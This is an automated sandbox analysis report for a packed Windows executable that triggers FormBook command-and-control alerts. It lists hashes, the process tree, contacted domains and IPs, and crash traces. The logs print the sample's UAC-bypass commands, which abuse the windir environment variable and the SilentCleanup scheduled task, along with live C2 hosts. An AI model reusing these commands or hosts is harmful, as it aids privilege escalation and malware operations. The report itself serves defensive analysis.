Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Nov. 17, 2021, 7:45 a.m.	Nov. 17, 2021, 8:37 a.m.

Size	838.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`843f2acb5a70e82a543855e716b2ce9c`
SHA256	`b88385613d90ebbd240b11a3847fc2117c0d832fdf7a3c45f1ed68692ed68038`
CRC32	`39ACB560`
ssdeep	`6144:dSYSrAc6N5eZONdMKjkSBoadoV6FXXb0TsdwCTmCaAu5OwlhdbpoOGZy6hY0Bb3K:HwAc6NyAFPXYIdI7Owlxn6136`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description) Malicious_Library_Zero - Malicious_Library UPX_Zero - UPX packed file

chikwazx.exe "C:\Users\test22\AppData\Local\Temp\chikwazx.exe"
2784
- cmd.exe cmd /c ""C:\Users\Public\Trast.bat" "
  3008
  - cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
    3068
    - reg.exe reg delete hkcu\Environment /v windir /f
      2140
    - reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
      2196
    - schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      2252
- cmd.exe cmd /c ""C:\Users\Public\nest.bat" "
  192
  - reg.exe reg delete hkcu\Environment /v windir /f
    2492

Name	Response	Post-Analysis Lookup
www.littlekylskap.com	CNAME frigsuede.myshopify.com CNAME shops.myshopify.com A 23.227.38.74	23.227.38.74
www.asagency.xyz	A 192.64.119.138	192.64.119.138
www.scoocs.info	A 142.250.66.115 CNAME ghs.googlehosted.com	172.217.31.147
www.staginglaneperf.com	A 205.178.144.150 CNAME staginglaneperf.com	205.178.144.150
www.tokencord.com	A 162.243.47.214	162.243.47.214
www.youandiconsulting.com	CNAME youandiconsulting.com A 34.102.136.180	34.102.136.180
www.naamgem.com	A 198.54.117.218 A 198.54.117.216 A 198.54.117.217 CNAME parkingpage.namecheap.com A 198.54.117.215 A 198.54.117.212 A 198.54.117.210 A 198.54.117.211	198.54.117.216
www.mab.network	A 139.99.69.103	139.99.69.103
www.revelstyle.com	A 52.58.78.16	52.58.78.16
www.valentinaturals.com	CNAME publicar.multiscreensite.com A 35.172.94.1 A 100.24.208.97	100.24.208.97
www.latinversionista.online
www.firmaheijnen.com	CNAME firmaheijnen.com A 91.184.0.95	91.184.0.95
www.milda.digital	A 156.67.72.57 CNAME milda.digital	156.67.72.57
www.lubot.net
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.129.233
www.mascotairportcarwash.online

IP Address	Status	Action
172.67.188.154	Active	Moloch
139.99.69.103	Active	Moloch
142.250.66.115	Active	Moloch
156.67.72.57	Active	Moloch
162.159.133.233	Active	Moloch
162.243.47.214	Active	Moloch
164.124.101.2	Active	Moloch
192.64.119.138	Active	Moloch
198.54.117.210	Active	Moloch
205.178.144.150	Active	Moloch
23.227.38.74	Active	Moloch
34.102.136.180	Active	Moloch
35.172.94.1	Active	Moloch
52.58.78.16	Active	Moloch
91.184.0.95	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49181 -> 23.227.38.74:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 23.227.38.74:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 23.227.38.74:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 156.67.72.57:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 156.67.72.57:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49191 -> 156.67.72.57:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 192.64.119.138:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 192.64.119.138:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 192.64.119.138:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 192.64.119.138:80	2031088	ET HUNTING Request to .XYZ Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49180 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49163 -> 162.159.133.233:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49187 -> 162.243.47.214:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 162.243.47.214:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49187 -> 162.243.47.214:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49189 -> 198.54.117.210:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 52.58.78.16:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49189 -> 198.54.117.210:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 52.58.78.16:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49189 -> 198.54.117.210:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49186 -> 52.58.78.16:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 142.250.66.115:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.99.69.103:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 142.250.66.115:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.99.69.103:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 142.250.66.115:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 139.99.69.103:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 35.172.94.1:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 35.172.94.1:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49190 -> 35.172.94.1:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 91.184.0.95:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 91.184.0.95:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 91.184.0.95:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 205.178.144.150:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 205.178.144.150:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 205.178.144.150:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.101:49164 162.159.133.233:443	None	None	None
TLSv1 192.168.56.101:49163 162.159.133.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 17, 2021, 7:45 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (22 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: /min C:\Users\Public\UKO.bat console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: reg console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: schtasks console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: The system was unable to find the specified registry key or value. console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: ERROR: console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: The system cannot find the path specified. console_handle: 0x0000000b	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: C:\Users\Public> console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: /min reg delete hkcu\Environment /v windir /f console_handle: 0x00000007	1	1
WriteConsoleW Nov. 17, 2021, 7:45 a.m.	buffer: The operation completed successfully. console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

HGTG

One or more processes crashed (50 out of 124 events)

Time & API	Arguments	Status
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlDosPathNameToNtPathName_U_WithStatus+0x33e LdrAccessResource-0x572 ntdll+0x4199e @ 0x7768199e RtlDosPathNameToNtPathName_U_WithStatus+0x2de LdrAccessResource-0x5d2 ntdll+0x4193e @ 0x7768193e RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633008 registers.edi: 1633096 registers.eax: 23117 registers.ebp: 1633068 registers.edx: 0 registers.ebx: 0 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlRetrieveNtUserPfn+0x464 RtlOpenCurrentUser-0x14e ntdll+0x5af21 @ 0x7769af21 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632860 registers.edi: 1632956 registers.eax: 23117 registers.ebp: 1632920 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003311104	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageNtHeader+0x1b RtlDeleteCriticalSection-0x1476 ntdll+0x3317f @ 0x7767317f RtlRetrieveNtUserPfn+0x2ea RtlOpenCurrentUser-0x2c8 ntdll+0x5ada7 @ 0x7769ada7 RtlRetrieveNtUserPfn+0x4bb RtlOpenCurrentUser-0xf7 ntdll+0x5af78 @ 0x7769af78 RtlDosPathNameToNtPathName_U_WithStatus+0x26e LdrAccessResource-0x642 ntdll+0x418ce @ 0x776818ce RtlDosPathNameToNtPathName_U_WithStatus+0xee LdrAccessResource-0x7c2 ntdll+0x4174e @ 0x7768174e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1632992 registers.edi: 1633080 registers.eax: 23117 registers.ebp: 1633052 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 1633024	1
__exception__ Nov. 17, 2021, 7:45 a.m.	stacktrace: RtlImageDirectoryEntryToData+0x5c RtlAddRefActivationContext-0x80 ntdll+0x2f5a2 @ 0x7766f5a2 RtlImageDirectoryEntryToData+0x1a RtlAddRefActivationContext-0xc2 ntdll+0x2f560 @ 0x7766f560 RtlDosPathNameToNtPathName_U_WithStatus+0x10e LdrAccessResource-0x7a2 ntdll+0x4176e @ 0x7768176e RtlLoadString+0x9c TpSetTimer-0x5bd ntdll+0x43e5f @ 0x77683e5f LoadStringBaseExW+0x51 LoadStringA-0x91 kernelbase+0x13b2a @ 0x760d3b2a LoadStringA+0x1d RegisterClassExA-0x5a user32+0x1db3e @ 0x76bedb3e New_user32_LoadStringA@16+0x91 New_user32_LoadStringW@16-0x8b @ 0x73ce7322 0x5d60e3 0x5d4117 0x5d4204 chikwazx+0x63d17 @ 0x463d17 chikwazx+0x64444 @ 0x464444 chikwazx+0x453b @ 0x40453b chikwazx+0x45a3 @ 0x4045a3 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x766e33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77679ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77679ea5 exception.instruction_r: 66 39 06 0f 85 7d c8 00 00 8b 46 3c 89 45 dc 3a exception.symbol: RtlImageNtHeaderEx+0x5a RtlImageDirectoryEntryToData-0x57 ntdll+0x2f4ef exception.instruction: cmp word ptr [esi], ax exception.module: ntdll.dll exception.exception_code: 0xc0000005 exception.offset: 193775 exception.address: 0x7766f4ef registers.esp: 1633116 registers.edi: 1633212 registers.eax: 23117 registers.ebp: 1633176 registers.edx: 0 registers.ebx: 6094848 registers.esi: 6094848 registers.ecx: 2003414528	1
